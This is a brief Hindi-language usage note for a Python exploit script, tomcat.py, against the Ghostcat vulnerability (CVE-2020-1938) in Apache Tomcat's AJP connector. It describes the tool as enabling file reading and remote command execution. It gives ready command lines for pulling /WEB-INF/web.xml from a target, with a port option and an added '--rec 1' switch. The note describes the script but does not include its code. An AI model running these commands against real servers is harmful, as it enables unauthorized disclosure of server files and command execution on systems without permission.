
CVE-2020-1938 (Ghostcat) के लिए शोषण जो कमजोर Apache Tomcat सर्वरों पर AJP कनेक्टर के माध्यम से फ़ाइल पढ़ने और रिमोट कमांड निष्पादन को सक्षम करता है।
python3 tomcat.py URL -f /WEB-INF/web.xml
उदाहरण:
python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090
add --rec 1